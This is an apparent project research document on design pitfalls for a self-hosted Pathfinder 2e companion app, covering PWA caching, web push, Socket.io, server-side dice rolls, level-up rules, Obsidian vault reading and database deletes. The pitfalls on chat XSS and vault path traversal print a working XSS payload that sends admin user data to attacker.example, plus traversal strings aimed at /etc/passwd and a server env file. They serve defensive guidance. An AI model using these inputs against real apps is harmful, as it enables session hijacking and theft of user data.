Files

Alexander Zielonka 5e332ad8ef docs(research): synthesize project research

2026-04-27 10:18:23 +02:00

56 KiB

Raw Blame History

Pitfalls Research

Domain: Self-hosted PF2e TTRPG companion app — PWA + multi-screen battle + extended Socket.io + Obsidian read-only vault + full PF2e Level-Up Researched: 2026-04-27 Confidence: HIGH for PWA/Push/Socket.io/Prisma areas (verified via official sources and 2026 docs); HIGH for PF2e rules (verified against Archives of Nethys); MEDIUM for Obsidian-specific markdown traps (community wisdom + forum threads)

This document is opinionated. Pitfalls are grouped by the six active phase buckets (Level-Up, PWA, Battle-Multi-Screen, Dice/Chat, GM-Live-Tools, Obsidian) plus cross-cutting categories (Prisma/Postgres, Socket.io, Mobile-at-the-Table). Each pitfall lists warning signs, prevention, and the phase that owns it.

Critical Pitfalls

What goes wrong: The service worker caches a /api/characters/:id response as part of an offline-read strategy. User A logs out, user B logs in on the same device (shared GM laptop, same browser profile). User B opens the cached character page and sees user A's character — or worse, user A's JWT-derived data — because the cache key is the URL, not the user identity.

Why it happens: Service worker fetch-handlers cache by request URL by default. They don't know about JWT context. The browser also keeps the service worker alive across login/logout because logout only clears storage, not caches.

How to avoid:

Cache only non-sensitive static assets (JS/CSS/icons/manifest) with a network-first or cache-first strategy
For authenticated API responses, use IndexedDB keyed by userId (not the SW Cache API), and clear it on logout
On logout: explicitly call caches.delete() for any user-scoped cache name AND swReg.unregister() is overkill but messaging postMessage("LOGOUT") to the SW lets it purge user data
Treat any URL containing /api/characters/, /api/campaigns/, /api/battle/ as never cache by URL alone — always wrap in a user-scoped key

Warning signs:

A second logged-in user reports seeing data they shouldn't
DevTools → Application → Cache Storage shows entries with sensitive paths after logout
Multi-user shared device shows stale data

Phase to address: PWA (the offline-read story has to be designed user-scoped from day one)

Pitfall 2: Service Worker + Socket.io mid-game force-update interrupts an active battle session

What goes wrong: A new SW version deploys mid-session. Default Workbox behavior (skipWaiting() + clients.claim()) reloads tabs, killing the open Socket.io connection on the GM laptop and the table display. Initiative state is in-memory on the client; reconnecting after a forced reload causes flicker, dropped events, or — worst case — the GM has to re-drag tokens because the WebSocket replay didn't catch the missed events.

Why it happens: Devs follow tutorials that recommend skipWaiting() for "instant updates" without considering that some apps (this one) absolutely cannot reload mid-task. Service workers in 2026 still have long default update cycles (24h check) but skipWaiting() short-circuits that to immediate.

How to avoid:

NEVER call skipWaiting() automatically. Wait for user action.
Show a non-blocking "Neue Version verfügbar — jetzt aktualisieren?" toast/banner. Only reload when the user clicks.
During an active battle session, suppress the update prompt entirely until the session is closed. Track active-battle state in a Zustand store; gate the toast on !isInBattle.
Use Workbox's ServiceWorkerRegistration.waiting + controllerchange event for the manual flow.
Tag SW versions with git SHA so you can correlate "stuck on old version" reports with deploy times.

Warning signs:

Players report "it reloaded in the middle of a fight"
Multiple SW versions reported in chrome://serviceworker-internals for active users
Token positions desync between GM laptop and table display after deploy

Phase to address: PWA (must be designed before the first SW ships — retrofitting "don't update during battle" is hard)

Pitfall 3: iOS Safari PWA push notifications silently fail because the install path or manifest is wrong

What goes wrong: GM sends a "Würfelaufforderung" push to all players. Android players get it. iOS players get nothing. No error, no log entry, just silence. Investigation reveals one of: app wasn't installed via "Add to Home Screen", manifest didn't have "display": "standalone", app was opened from Safari tab not home-screen icon, OR the user is in the EU where iOS PWAs behave differently (Apple has shipped EU-region restrictions).

Why it happens: iOS 16.4+ supports Web Push, but only for PWAs installed to the home screen running in standalone mode. Permission prompts must be triggered by direct user gesture. The manifest requirements are stricter than on Android. EU regulatory changes have caused iOS PWA push to be flaky depending on Safari version and region.

How to avoid:

Manifest must include: "display": "standalone", name, short_name, start_url, full icon set including 192x192 and 512x512, maskable icon variant for Android
Add an in-app "Install Guide" page targeted at iOS: detect navigator.standalone === false && /iPhone|iPad/.test(navigator.userAgent) and show explicit instructions ("Teilen-Button → Zum Home-Bildschirm")
Permission prompt: show only after user taps a deliberate "Benachrichtigungen aktivieren" button — never on first load
After permission grant, immediately do a self-test: send a test push from server and confirm receipt in client. If silent, surface a clear error.
Document the EU caveat in user-facing help: PWAs in EU may not get push depending on iOS version; recommend Android Chrome or non-EU iOS
HTTPS is mandatory — even self-hosted dev needs a valid cert (use mkcert or Let's Encrypt + reverse proxy)

Warning signs:

"I didn't get the ping" from one platform but not others
Permission shows "denied" or "default" forever after a failed first attempt
pushManager.getSubscription() returns null after permission grant

Phase to address: PWA

Pitfall 4: VAPID key gets lost or rotated → all existing push subscriptions silently break

What goes wrong: Server is rebuilt, .env is regenerated, VAPID keys are different. All PushSubscription rows in the DB now point to the old public key. Push sends fail with 401/403, but the player-facing app shows the user as "subscribed". Users wonder why pings stopped working. There is no UI signal because subscriptions appear valid client-side.

Why it happens: VAPID keys are application-server-identity keys. web-push libraries don't refuse to send with mismatched keys until the push service rejects. Devs treat .env as ephemeral and lose the keypair.

How to avoid:

VAPID keys are application secrets — back them up like JWT_SECRET. Document explicitly in .env.example that these must be persistent across deploys.
Generate them once during initial setup, commit the public key to a build-time constant (or fetch from a stable endpoint), keep the private key server-side only
Implement automatic 410-Gone cleanup: on push send, if the push service returns 410, delete that PushSubscription row. Without this, expired subs accumulate and waste send budget.
Listen to the pushsubscriptionchange event in the service worker — when the browser rotates a subscription, re-register with the server
On startup, log VAPID public key fingerprint so you notice if it changes unexpectedly
Never rotate VAPID keys without a migration plan — rotation invalidates every existing subscription and there's no resubscribe-without-permission path

Warning signs:

"Push works but not for older users"
401/403 spike in push send logs
PushSubscription row count growing forever (no cleanup)
Random subscription fails after browser updates

Phase to address: PWA / GM-Live-Tools

Pitfall 5: Display-mode (table screen) leaks GM-only data because role-checks live in components, not in the data layer

What goes wrong: The display screen reuses the BattleScreen React component with a displayMode prop. The component conditionally hides GM controls. But the WebSocket payload still contains npcStats.hidden = true, nextRoundEnemyAction = "uses healing potion at 30%", GM notes on tokens, hidden token positions (invisible enemies), or full HP values for monsters whose HP should appear as a vague bar. A curious player could open DevTools at the table, look at the WebSocket frames, and see everything.

Why it happens: "It's just a display screen, players can't interact" — but the display screen is on the same network, served by the same socket.io server, often connected with the GM's account or a shared anonymous account. The data filtering happens in render, not in the gateway emit.

How to avoid:

Treat the display screen as an untrusted client even though physically it's at the table
Server-side: emit two distinct event channels, battle:gm:* and battle:display:*, with the display channel containing only what's safe to show (token positions, public HP bars, initiative order, public conditions)
Authenticate the display screen with a separate display-only token issued by the GM (short-lived, scoped to one battle, can't access other endpoints)
Display-screen routes server-side must reject attempts to read GM-only fields even with a valid token
Add a "Display token" UI: GM clicks "Display starten" → server issues a one-shot token + URL with embedded token → display screen opens that URL → token expires when battle ends
Test: open the display URL in incognito, run socket.on("*", console.log), verify no GM data appears in any frame

Warning signs:

Display screen URL works after copy-paste from another browser
WebSocket frames sent to display include fields the player UI also doesn't render
Display screen survives GM logout

Phase to address: Battle-Multi-Screen

Pitfall 6: Client-side dice rolls are tampered/spoofed — players can claim any result

What goes wrong: Player rolls 1d20+7 for a critical save. Client computes the result, emits dice:roll {result: 20, total: 27} over WebSocket. Server broadcasts to chat. Either: (a) a player modifies the JS to always return 20, or (b) a player intercepts the WebSocket frame and edits the value. There's no way to detect cheating after the fact.

Why it happens: Convenience: it's easier to roll on the client and broadcast the result. PF2e crits (rolls of 20 OR results 10+ over DC) and persistent damage rolls feel "natural" to compute locally. Devs forget WebSocket payload is fully attacker-controlled.

How to avoid:

All rolls happen server-side. Client emits dice:request {notation: "1d20+7", purpose: "save"}. Server parses, rolls (using crypto.randomInt), persists to RollLog, broadcasts result.
Use a tested PF2e-aware notation parser. Required features:
- Critical hits (PF2e: nat 20 OR meets-or-exceeds DC by 10 → crit; nat 1 OR misses by 10 → critical fail)
- Crit doubles dice, NOT modifiers — 2d6+4 crits to 4d6+4, not 4d6+8. This is a frequent bug in generic parsers.
- Persistent damage (2d6 persistent fire → recurring roll on each turn-end with DC 15 flat-check to remove)
- Recharge dice for some abilities
- keep highest, keep lowest, advantage/disadvantage (rare in PF2e but used by some feats)
Server stores roll seed + notation + result + roller + timestamp → fully auditable
Client-side has a shadow roller for instant feedback while waiting for server roll, but the server result is canonical and replaces the shadow on receipt

Warning signs:

Suspiciously high crit rate from one player
Roll log shows results that don't match notation
Players asking to "edit" their roll

Phase to address: Dice/Chat

Pitfall 7: Markdown chat messages enable XSS via raw HTML or javascript: URLs

What goes wrong: Chat supports markdown for formatting (bold, italics, links to roll results). A malicious or compromised player sends <img src=x onerror="fetch('/api/admin/users', {credentials:'include'}).then(r=>r.json()).then(d=>fetch('https://attacker.example/'+btoa(JSON.stringify(d))))">. The GM (admin) renders the message and runs the script in their session, leaking user data. Or a [click](javascript:...) markdown link that fires on click.

Why it happens: Devs use dangerouslySetInnerHTML with marked/markdown-it because it's easy. Or they use react-markdown but enable rehype-raw without rehype-sanitize because they want HTML inside markdown. Or they don't filter the URL protocols on links.

How to avoid:

Use react-markdown without rehype-raw for chat. Markdown → React elements directly, no dangerouslySetInnerHTML, no raw HTML.
Restrict allowed elements: allowedElements={['p','strong','em','code','pre','a','ul','ol','li','blockquote']}. No img, no iframe, no script, no style.
urlTransform to enforce protocol whitelist: only allow http:, https:, and internal route paths. Block javascript:, data:, vbscript:.
Server-side: validate message length (max ~2000 chars), strip control characters, refuse messages with HTML tags before storage. Defense in depth.
For roll embeds in chat (the killer feature), use a custom React component slot, not raw HTML — [[roll:abc123]] token that the renderer expands into a <RollResult> component fetching from server state.

Warning signs:

Any use of dangerouslySetInnerHTML in chat code
rehype-raw in the markdown pipeline without rehype-sanitize
Allowing img or a target="_blank" without rel="noopener noreferrer"

Phase to address: Dice/Chat

Pitfall 8: PF2e Level-Up — boost rules at-18 cap silently break ability scores

What goes wrong: Character has STR 18 at level 4. At level 5, four boosts must be allocated to four different attributes. UI lets player apply a boost to STR. Code adds +2 (because that's the standard boost) → STR 20. Wrong. Per the rules, a boost on a stat already 18 or higher adds only +1, not +2. The character's whole sheet is now overpowered. If the bug goes unnoticed for several levels, recomputing is expensive (every save/skill/AC was wrong from then on).

Why it happens: "Boost = +2" is the simple version. The +1 above 18 rule is easy to miss. Pathbuilder handles it, so devs comparing in-app to Pathbuilder don't notice for a while.

How to avoid:

Centralize the boost computation in a applyAttributeBoost(currentValue): number function. Single source of truth: currentValue >= 18 ? +1 : +2. Test it.
Validate boosts as a set, not individually. A "level 5 boost set" must apply to four different attributes. UI should grey out already-boosted attributes.
For each level-up, persist the decision (which 4 attributes) AND the resulting value, not just the value. Lets you replay/audit.
Edge cases to test:
- All four boosts applied to attributes already at 18 → all +1
- One boost applied twice in same set (forbidden — must be different attributes)
- Free Archetype variant rule (no extra boosts, but interacts with feats)
- Pathbuilder import of an already-leveled character: trust their values for prior levels, only validate from current level forward

Warning signs:

Character sheet shows attribute > 18 at level 5 without the +1 cap
Boost UI lets you click STR twice in same boost set
Differs from Pathbuilder result for the same character

Phase to address: Level-Up

Pitfall 9: PF2e Level-Up — recompute side effects (HP cap, AC, saves) corrupt current state

What goes wrong: Character is at HP 12/40 (badly wounded). Player levels up: CON boost increases HP-Max from 40 → 50. App correctly updates hp.max = 50 but also bumps hp.current = 50 ("you healed!"). Or: app sets hp.current = min(hp.current, hp.max) → still 12, fine — but in the inverse case, a CON DECREASE due to retrain would silently drop current HP below 0.

Worse: proficiency increase from Trained → Expert at level 3 changes save bonuses. App recomputes the +N modifier but doesn't apply it to the in-flight damageReceived calculation if combat is active.

Why it happens: Level-up touches HP, AC, saves, perception, skills, attacks. Every one of those has a "current" value and a "max/computed" value. Devs change the formula without thinking through the cap/floor invariants.

How to avoid:

Level-up commits in a Prisma transaction. All recomputed fields written atomically.
HP rule: on HP-Max increase, current does NOT change (player gets new room to heal). On HP-Max decrease (rare, undo case), current is min(current, newMax). Document this rule in code.
Level-up CANNOT happen during an active battle session — gate it. PF2e level-ups happen during downtime/rest, never mid-fight.
After commit, broadcast a single character:level-up:complete event with the full new sheet, not a sequence of small updates (avoids inconsistent intermediate states broadcast to other clients).
Test scenario: character at 0 HP with Dying 2 levels up (edge case for raise-dead-then-level mid-session) — must not silently kill the character or remove Dying.

Warning signs:

HP fully refilled after level-up (should keep the player's current value)
Save modifiers don't update after proficiency increase
Conditions disappear after level-up

Phase to address: Level-Up

Pitfall 10: PF2e Level-Up — undo/retrain creates orphaned feat dependencies

What goes wrong: Player retrains a level-2 class feat (per the retraining rules). The retired feat was a prerequisite for a level-6 feat the player still has. The level-6 feat now violates its prereq but stays on the sheet. Or: archetype dedication retrained, but the player still has 2 archetype feats pointing to that archetype, in violation of the "must take 2 feats from archetype before another dedication" rule.

Why it happens: Feats are stored as a flat list. Prerequisites are checked at acquisition time, not as an invariant. Removing a feat doesn't trigger re-validation of dependent feats.

How to avoid:

Model feats with explicit prerequisites: FeatId[] graph
On any feat removal (retrain, undo level-up, archetype change), run a transitive-closure check: any remaining feat whose prereqs are now unmet must be flagged
Don't auto-remove dependent feats — surface a "Diese Talente verlieren ihre Voraussetzung" warning and force the player to choose: retrain those too, or block the retrain
Archetype invariants:
- Cannot take a 2nd archetype dedication until 2 non-dedication feats from the 1st archetype are taken
- With Free Archetype variant, dedication taken at level 1 may have no valid feat at level 2 (all archetype feats are usually level 4+) — surface this as a known gap, allow temporary placeholder
- Must be prevented: dedication-spam (taking 4 dedications in a row, breaking RAW)
Persist level-up history as an append-only log so undo means "create an inverse entry", not destructive update

Warning signs:

Character has feats whose prereq feat is missing
Two archetype dedications without 2 feats from the first archetype between them
Undo of level-N corrupts data at level-(N+1)

Phase to address: Level-Up

Pitfall 11: PF2e Level-Up — skill increase tracking forgets which skills were already increased at which level

What goes wrong: Player has Trained in Athletics at level 1, increases to Expert at level 3, Master at level 7, Legendary at level 15. App stores athletics.proficiency = "legendary" only. At level 20, player wants to undo the level-15 increase. App doesn't know which skill was the level-15 choice — has to guess or block all undo.

Why it happens: Final value is what's displayed on the sheet, so devs only persist the final value. The history of increases is implicit ("must have been at level 15 because legendary") which fails when multiple skills are at the same rank.

How to avoid:

Persist SkillIncreaseHistory as (characterId, skillId, level, fromRank, toRank) rows
On any skill query, current rank = sum of increases up to current level
This also makes the rank-gates trivial to enforce: at levels 3-6, only Trained→Expert. At 7+, also Expert→Master. At 15+, also Master→Legendary.
Pathbuilder import: synthesize history rows when possible (Pathbuilder export contains ranks per level), otherwise create one row per current rank with level = currentLevel (lossy but at least consistent)

Warning signs:

Level-up UI lets player increase a skill they already increased this level
Undo of level-N skill increase requires guessing which skill
Imported character has different ranks than Pathbuilder

Phase to address: Level-Up

Pitfall 12: Obsidian wikilinks resolve ambiguously to the wrong note

What goes wrong: Vault has Characters/Aldrin.md and NPCs/Aldrin.md. A note links [[Aldrin]]. App's resolver picks the first match (alphabetical, by depth, or by a path heuristic). Sometimes it picks Characters/Aldrin, sometimes NPCs/Aldrin, depending on file order returned by the filesystem. Player following the link gets the wrong character page. Indexing performance also varies.

Why it happens: Obsidian uses a "shortest path that's still unique" rule. When multiple notes have the same basename, the rule does NOT pick the first match — it falls back to absolute path. Naive resolvers don't replicate this.

How to avoid:

Implement Obsidian's resolution algorithm faithfully:
1. Exact match on the link text ([[Folder/Name]]) → resolve to that path
2. Otherwise, basename match: if exactly one file in the vault has that basename, use it
3. If multiple files share the basename, the link is ambiguous → either error out, render as [[Aldrin (mehrdeutig)]] with a tooltip listing matches, or use the link's containing-folder context
Build a basename index at vault-load time: Map<basename, fullPath[]>. Detect ambiguity in O(1).
Cache the index, invalidate when the vault changes (mtime check or webhook from the vault server)
Surface ambiguity to the user — a vault read-only browser that silently picks wrong is worse than one that says "ambiguous, choose one"
Don't follow Obsidian's "shortest path possible" link-creation default unless you also implement its conflict UI; pick a deterministic tie-breaker (alphabetical full path) and document it

Warning signs:

Same wikilink resolves differently on different vault reads
Two notes with the same basename and link target unclear
Performance regression in resolver as vault grows

Phase to address: Obsidian

Pitfall 13: Obsidian embed loops cause stack overflow / infinite render

What goes wrong: A.md contains ![[B]] (embed B). B.md contains ![[A]]. Naive recursive renderer expands forever, eventually crashing the tab or hanging the server depending on where rendering happens.

Why it happens: Embeds are recursive by design. Devs implement them as straight recursion without cycle detection.

How to avoid:

Maintain a per-render Set<resolvedPath> of already-being-rendered notes. Before recursing into an embed, check if path is in the set. If yes, render [Eingebettete Note: {name} (Zyklus)] placeholder.
Hard cap embed depth at 3-4 levels even in non-cyclic cases (deeply nested embeds are user error)
Render server-side OR limit client-side embed expansion to one level (Obsidian itself doesn't recursively expand more than one level on first render)
Test with a known-cyclic vault before shipping

Warning signs:

Page hangs on certain notes
Server CPU spike on vault read of specific files
Stack overflow errors in renderer

Phase to address: Obsidian

Pitfall 14: Vault path traversal allows reading files outside the vault root

What goes wrong: Vault server endpoint accepts ?path=../../etc/passwd or ?path=Notes/../../../server.env. Naive path joining (vaultRoot + userInput) followed by fs.readFile reads any file the server process can access.

Why it happens: Server devs forget that wikilinks come from user-controlled markdown content, not just direct API calls. Even reading-only is dangerous if the read can target sensitive files.

How to avoid:

Resolve the requested path with path.resolve(vaultRoot, userPath)
Verify the resolved absolute path starts with vaultRoot + path.sep — reject otherwise
Refuse any path containing .., null bytes (%00), or symlinks pointing outside the vault
Whitelist file extensions: .md, .png, .jpg, .jpeg, .gif, .webp, .svg, .pdf. Reject everything else.
Authenticate the vault endpoint with the same JWT as the rest of the API
On Windows, also reject paths containing : or device names (CON, PRN, NUL, AUX, COM1-COM9, LPT1-LPT9) — can be used for device-name attacks

Warning signs:

Vault endpoint accepts arbitrary path strings without validation
Resolved path doesn't get normalized before access
Tests don't cover .., symlinks, or absolute paths

Phase to address: Obsidian

Pitfall 15: Socket.io message ordering breaks on reconnect; Connection State Recovery not enabled

What goes wrong: Player loses Wi-Fi for 5 seconds during battle. GM updates 3 token positions during that gap. On reconnect, player sees only the latest token position emitted after reconnect — the 3 missed updates are lost. Or worse, a chat message sent during the gap never arrives, and there's no indication of loss.

Why it happens: Default Socket.io reconnects but does NOT replay missed events unless Connection State Recovery (CSR) is explicitly enabled. Even with CSR, the recovery window is short (default 2 minutes) and the adapter must support it.

How to avoid:

Enable Connection State Recovery on the server: io({connectionStateRecovery: {maxDisconnectionDuration: 2 * 60 * 1000, skipMiddlewares: true}})
For events that must not be lost (chat messages, dice rolls, GM-pings), use the retries option on emit: socket.emit(event, payload, {retries: 3}) and require server ack
For state-sync events (HP, token position), don't worry about replay — instead, on reconnect, re-fetch the current state via REST and reconcile. WebSocket events are the live update channel; REST is the source of truth.
Persist chat and rolls to Postgres immediately on receipt, broadcast as a notification only. On reconnect, client refetches since=lastSeenId from REST.
Acknowledge important events: server emits chat:new with a callback; client invokes the callback to confirm receipt; server retries N times if no ack within timeout.

Warning signs:

"I missed the GM's message" reports
Token positions desync between clients
Chat history has gaps after a reconnect
No ack-tracking on critical events

Phase to address: Battle-Multi-Screen, Dice/Chat (cross-cutting WebSocket area)

Moderate Pitfalls

Pitfall 16: Cascading deletes wipe historical data unintentionally

What goes wrong: GM deletes an old battle session for cleanup. With onDelete: Cascade on BattleSession → RollLog, all roll history from that battle is gone. Players lose their historic crits. Or: campaign deletion cascades to characters, characters cascade to rolls — entire user history vanishes.

Why it happens: Devs default to Cascade because "clean up automatically". Don't think about which children are historical records vs transient state.

How to avoid:

Decide per-relation: is the child dependent state (token positions only meaningful inside their battle → Cascade) or historical record (rolls/chat are part of campaign history → Restrict or SetNull with archivedAt)?
Soft-delete (deletedAt: DateTime?) for top-level entities (Campaign, BattleSession) so accidents are recoverable
For PushSubscription: Cascade on User delete (no orphan subs)
For RollLog/ChatMessage: NoAction on User delete (preserve history; show "Spieler entfernt" instead of name); soft-delete the user
For BattleEffect: Cascade on token delete (effect is a property of the token)
Document each onDelete in a comment in schema.prisma

Warning signs:

Deleting a parent unexpectedly nukes lots of child rows
Migration introduces Cascade on a relation that previously had Restrict
No soft-delete on user-facing entities

Phase to address: All phases that add new tables (Level-Up: LevelUpSession; PWA: PushSubscription; Battle: BattleEffect; Dice/Chat: RollLog, ChatMessage)

Pitfall 17: Per-event JWT validation overloads the gateway

What goes wrong: Codebase already has characters.gateway.ts doing JWT verification on connect. As new events are added (dice:roll, chat:send, battle:effect:apply), devs add per-event auth checks that re-decode the JWT every time. CPU spikes during a busy combat round (10+ events/sec).

Why it happens: "Belt and suspenders" mindset. JWT verify is fast (microseconds) but at scale it accumulates.

How to avoid:

Validate JWT once on connect (already done). Store the userId on the socket: socket.data.userId
Per-event handlers read socket.data.userId — no re-decode
Authorization (does this user have rights to this action?) is per-event, but uses the cached userId — only DB lookups for role/membership, no JWT work
Add token-revocation table check ONLY on connect, not per event. Acceptable trade-off: revoked token stays valid until disconnect (~minutes to hours).
Implement a server-side "kick" admin action that disconnects sockets by userId for emergency revocation

Warning signs:

CPU spike during high-event-rate moments
Repeated JWT verify calls in profiler output
Adding new events requires copy-pasting auth code

Phase to address: Cross-cutting (Battle-Multi-Screen, Dice/Chat, GM-Live-Tools all add new events)

Pitfall 18: WebSocket room cleanup leaks on disconnect

What goes wrong: Existing connectedClients Map (already noted in CONCERNS.md) grows because disconnects don't always remove entries cleanly. Add Battle rooms, Roll-Log rooms, Chat rooms → multiple maps, multiple leak paths. Server memory grows monotonically.

Why it happens: Custom client tracking duplicates Socket.io's built-in room tracking. Disconnect handler forgets one of the maps.

How to avoid:

Remove the custom connectedClients Map. Use Socket.io rooms exclusively. Rooms auto-cleanup on disconnect.
For "is user X online" queries, use io.in(user:${userId}).fetchSockets() rather than a custom map
Single disconnect handler does all cleanup; never spread cleanup across feature modules
Add a periodic health check that logs io.sockets.sockets.size — alert if it grows unboundedly

Warning signs:

connectedClients.size > sockets.size (drift)
Memory usage trends up over multi-day sessions
"Phantom" online users

Phase to address: Battle-Multi-Screen (when adding battle rooms + display rooms)

Pitfall 19: Mobile device sleeps during session, missing push and breaking WebSocket

What goes wrong: Player puts phone face-down on table. Phone sleeps after 30s. WebSocket disconnects. GM sends "Würfel Reflex-Save" push. Phone is asleep — push wakes it briefly, notification appears in tray, but the app's WebSocket is still disconnected. Player taps notification, app opens, but the app shows stale state because the reconnect-and-refetch flow takes 3+ seconds.

Why it happens: Mobile OSes aggressively suspend background tabs and apps. WebSocket through a sleeping phone is dead. Push wakes the OS but not the app's network state.

How to avoid:

On visibilitychange → visible, immediately: check WebSocket connection state, reconnect if needed, refetch current campaign + battle state via REST
Show a clear "Verbinde wieder..." indicator during reconnect, hide all stale data behind it
Wake Lock API for active turn: when it's the player's turn, acquire a wake lock so screen stays on. Release when turn ends. Document battery impact.
Push payload includes an action field: notification tap deep-links to the relevant page (battle, dice prompt, chat) so reconnect happens at the right place
Service worker handles push by displaying the notification AND optionally updating an IndexedDB queue of pending actions, so when the app reopens, it knows what was pending

Warning signs:

"I tapped the push but the app is in the wrong place"
Stale data on app reopen
Battery drain (over-eager wake lock or polling)

Phase to address: PWA / Mobile-First polish

Pitfall 20: Reconnect storm when Wi-Fi at the table flaps

What goes wrong: Wi-Fi at the gaming table briefly drops (router hiccup, neighbor microwaving). All 5 player phones + GM laptop + table display all disconnect simultaneously. Wi-Fi recovers. All 7 clients try to reconnect at the same moment. With Socket.io's default backoff, they all hit the server within 1 second. Server is fine for 7 clients, but if the server is also doing CPU-heavy work (e.g., translation API, DB query), the spike causes a cascade of slow connects, ack timeouts, more retries.

Why it happens: Same network, same event → synchronized reconnects. No jitter in the backoff.

How to avoid:

Configure Socket.io client with randomized backoff: reconnectionDelay: 1000, reconnectionDelayMax: 5000, randomizationFactor: 0.5
Server: rate-limit connection attempts per IP (the existing concern in CONCERNS.md flags this — fix in this milestone since we're adding more event load)
Connection State Recovery cushions the impact: if the disconnect was < 2min, the recovered session reuses state, no full re-init needed
Separate "static asset" CDN/path from API path so SW can serve cached UI even when API is overloaded

Warning signs:

All clients lose connection at once and recovery is slow
Server logs show simultaneous connect bursts
Long "Verbinde..." spinner after a brief outage

Phase to address: Battle-Multi-Screen (where reconnect resilience matters most), Mobile/PWA

Minor Pitfalls

Pitfall 21: Manifest icon traps (maskable, sizes, splash)

What goes wrong: Android shows a white square inside the app icon (because non-maskable icon used in maskable slot). iOS doesn't show a splash screen (because no apple-touch-icon link tags or apple-touch-startup-image). PWA looks unprofessional or non-installable.

How to avoid:

Provide both "any" and "maskable" icon variants. Maskable icons must have safe-zone padding (icon content within 80% diameter circle).
Sizes required: 192x192, 512x512, plus apple-touch-icon 180x180
iOS splash screens are device-specific; use a generator or a single-image fallback
Test on real iOS Safari + Android Chrome before claiming "PWA-ready"

Phase to address: PWA

Pitfall 22: Chat/roll history queries are not indexed for time-paginated reads

What goes wrong: SELECT * FROM ChatMessage WHERE campaignId = X ORDER BY createdAt DESC LIMIT 50 is fast at 1k messages, slow at 100k. Server hot-path during scrollback.

How to avoid:

Composite index @@index([campaignId, createdAt(sort: Desc)]) on ChatMessage and RollLog from day one
Use cursor-based pagination (WHERE createdAt < cursor ORDER BY createdAt DESC LIMIT 50) not offset-based
Optionally archive messages older than 1 year to a separate table (premature for this scale)

Phase to address: Dice/Chat

What goes wrong: Player opens app on the train (no Wi-Fi). PWA loads (cached shell), but the auth check (GET /api/auth/me) fails → app redirects to login → login API call also fails → user sees broken login screen and assumes app is dead.

How to avoid:

App-shell loads UI optimistically using cached JWT validity (decode locally, check exp)
Network errors on auth-check are NOT treated as "logged out" — they're "offline, using last-known identity"
Distinct error states: "Nicht eingeloggt" vs "Offline — gecachte Daten verfügbar"
Login form shows "Offline" banner if API unreachable, doesn't try to log in

Phase to address: PWA

Pitfall 24: Display screen aspect ratio mismatch on the table-embedded screen

What goes wrong: Built and tested on 16:9 laptop. Tabletop screen is some weird embedded panel (maybe 4:3, maybe portrait). Map is cropped or pillarboxed badly. Tokens look wrong.

How to avoid:

Display mode uses meta viewport to lock to actual screen pixels
Map renders to a fit-to-window container with letterboxing background, not absolute pixels
Detect aspect ratio at load and adjust default zoom; provide GM control to "frame to display"
Get the actual screen specs from the user before shipping

Phase to address: Battle-Multi-Screen

Pitfall 25: GM-tool safety — accidental "set HP to 0 for all party"

What goes wrong: GM has bulk-control tools ("apply Frightened to all enemies"). Slips and clicks "all party" instead of "all enemies". Whole party drops to 0 HP, conditions piled on. Without confirmation, undoable change is a disaster mid-fight.

How to avoid:

Destructive bulk actions require confirmation modal naming the affected entities
All GM-live-tool actions are in a transaction that emits a single broadcast — recoverable by the ctrl-Z action that undoes the transaction
Keep an in-memory "last action" stack (last 5 actions) on GM client with one-click undo
High-impact actions (set HP to 0, kill, end battle) require a typed confirmation ("ALLE TÖTEN" must be typed)

Phase to address: GM-Live-Tools

Technical Debt Patterns

Shortcut	Immediate Benefit	Long-term Cost	When Acceptable
Client-side dice rolls	Instant feedback, no server roundtrip	Cheating possible, no audit, no replay	Never for canonical rolls — OK as preview/shadow only
`dangerouslySetInnerHTML` for chat markdown	Easy to render, all features work	XSS, account takeover via chat	Never
Cache API for authenticated responses	Simple offline support	User-data leak across logins	Never — use IndexedDB user-scoped
`skipWaiting()` + `clients.claim()` in SW	Instant updates	Mid-session reload kills state	Never in this app
Storing final ability score only (no boost history)	Simpler model	Can't undo level-ups, can't audit	Never — store boost decisions
Custom `connectedClients` Map	"Easy" presence tracking	Memory leaks, drift	Never — use `io.in(room).fetchSockets()`
`db push` instead of `prisma migrate dev`	Skips writing migration	Lost migration history, prod drift	Never (already enforced by CLAUDE.md)
`any` types for level-up wizard state	Move fast through prototyping	Bugs in branching wizards are silent	Only for spike branches that get rewritten
Reading vault files with raw user paths	Simple impl	Path traversal	Never
Single `RollLog` table without index	Works at small scale	Slow scrollback at 50k+ rolls	Acceptable until index strategy decided in same phase

Integration Gotchas

Integration	Common Mistake	Correct Approach
Web Push / VAPID	Regenerate VAPID keys on every deploy	Persist keys in `.env`, treat as secret, document in `.env.example`
Service Worker + Socket.io	Try to handle WebSocket inside SW	SW is for static cache + push only; WebSocket lives in the page, reconnects on visibility
iOS PWA Push	Test only in Safari tab, not installed PWA	iOS push requires home-screen install + standalone display mode
Obsidian vault sync	Read directly from filesystem during edit	Vault contents may change mid-read; use a stable snapshot (git ref or mtime guard)
Pathbuilder import → in-app level-up	Treat imported character as authoritative for all levels then layer level-ups	Snapshot the import as level N, persist explicit level-up decisions only for level N+1 onward
Claude API (existing) for new content (level-up flavor text)	Add to critical path	Cache aggressively, never block UI on translation, fallback to English
Postgres + Prisma 7	Default `Restrict` on relations causes mysterious failures on parent delete	Decide explicit `onDelete` per relation, document in schema comment

Performance Traps

Trap	Symptoms	Prevention	When It Breaks
Unbounded `RollLog` query without index	Chat scrollback slows over weeks	Composite index on (campaignId, createdAt DESC); cursor pagination	~50k rolls per campaign
Recursive embed render without depth cap	Some vault notes hang the page	Cycle detection + max depth 3	One cyclic note in vault
Per-event JWT verify	Server CPU spike during combat rounds	Decode once on connect, cache userId on socket	~20 events/sec sustained
Broadcast every token nudge	Network thrash, mobile battery drain	Debounce drag events (60ms), emit final position only on drop	Continuous drag at 60fps × N players
All clients reconnect at once after Wi-Fi flap	Server connect-burst lag	Randomized backoff, rate limit	Network flap with 5+ clients
Translation lookup on every character read (existing)	Slow character sheet load	Pre-cache on seed, batch missing on load (already in CONCERNS.md)	50+ unique items per character
SW Cache for authenticated API responses	Stale data, leak between users	Don't cache auth responses in Cache API	First multi-user device

Security Mistakes

Mistake	Risk	Prevention
Display-screen authenticated as GM	Player at table opens DevTools, sees GM-only data	Issue display-only short-lived token; server-side filter GM data per channel
Markdown chat with raw HTML	Account takeover via injected `<img onerror>`	`react-markdown` without `rehype-raw`, urlTransform, no `dangerouslySetInnerHTML`
Client-rolled dice broadcast as authoritative	Players spoof crits	All rolls server-side with `crypto.randomInt`, persist seed
